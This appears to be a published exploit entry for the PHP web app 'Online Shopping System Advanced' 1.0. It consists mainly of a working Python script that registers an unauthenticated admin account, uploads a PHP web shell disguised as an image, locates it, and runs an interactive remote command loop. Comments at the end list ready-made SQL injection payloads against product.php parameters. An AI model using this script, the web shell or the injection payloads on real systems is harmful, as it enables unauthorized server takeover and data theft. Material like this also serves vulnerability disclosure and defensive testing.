# Exploit Title: Online Shopping System Advanced - Remote Code Execution # Date: 2025-03-11 # Exploit Author: bRpsd # Contact: cy@live.no # Zone-H: www.zone-h.org/archive/notifier=bRpsd # Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced/ # Version: 1.0 [latest] # Tested on: MacOS XAMPP Darwin Kernel # CVE : N/A import requests import argparse from bs4 import BeautifulSoup import os parser = argparse.ArgumentParser(description='Unauthenticated Privilege Escalation + Arbitrary File Upload = RCE ') parser.add_argument('--url', required=True, help='Base URL of the application') args = parser.parse_args() # Define the base URL of the application base_url = args.url # Step 1: Registering an Admin User register_url = f"{base_url}/admin/reg.php" register_data = { "admin_name": "exploit_admin", "admin_email": "exploit_admin@example.com", "password_1": "password123", "password_2": "password123", "reg_user": "Register" } # Create a session to maintain cookies session = requests.Session() # Send the registration request register_response = session.post(register_url, data=register_data) print("Admin created") # Step 2: Login as Admin login_url = f"{base_url}/admin/login.php" login_data = { "admin_username": "exploit_admin@example.com", "password": "password123", "login_admin": "Log in" } # Send the login request login_response = session.post(login_url, data=login_data) print("Logged in as admin") # Step 3: Upload a PHP Shell edit_product_url = f"{base_url}/admin/admin/edit_product.php?product_id=1" php_shell = "<?php if(isset($_GET['cmd'])) { echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>" files = { "picture": ("shell.php", php_shell, "image/jpeg") } upload_data = { "product_name": "Exploit Product", "details": "This is a test product", "price": "100", "product_type": "1", "brand": "1", "tags": "exploit", "btn_save": "Save" } # Send the file upload request upload_response = session.post(edit_product_url, data=upload_data, files=files) print("Shell uploaded") # Step 4: List files in the product_images directory product_images_url = f"{base_url}/product_images/" response = session.get(product_images_url) soup = BeautifulSoup(response.text, 'html.parser') # Find all links to files in the directory links = soup.find_all('a') shell_path = None for link in links: href = link.get('href') if 'shell.php' in href: shell_path = href break if shell_path: shell_url = f"{product_images_url}{shell_path}" print(f"Shell URL: {shell_url}") # Step 5: Interact with the Shell def execute_command(command): response = session.get(shell_url, params={"cmd": command}) return response.text # Example of executing commands while True: cmd = input("command: ") if cmd.lower() in ['exit', 'quit']: break output = execute_command(cmd) print(output) else: print("Shell location not found.") # There's also an SQLi in multiple parts of the script such as # /product.php?p=71 # /products.php?cat_id=6 # Parameter: p (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) # Payload: p=73%' AND 2717=2717# # Type: error-based # Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) # Payload: p=-8485%' OR 1 GROUP BY CONCAT(0x717a6a6b71,(SELECT (CASE WHEN (7151=7151) THEN 1 ELSE 0 END)),0x716a6b7871,FLOOR(RAND(0)*2)) HAVING MIN(0)# # # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: p=73%' AND (SELECT 2579 FROM (SELECT(SLEEP(5)))bYFm) AND 'Wgsl%'='Wgsl # #Type: UNION query #Title: MySQL UNION query (NULL) - 10 columns #Payload: p=73%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x574f756e6670686a636b76776b5973734d7a434e634a6e66746c704946477a7068656e7a64544e54,0x716a6b7871),NULL,NULL,NULL,NULL,NULL#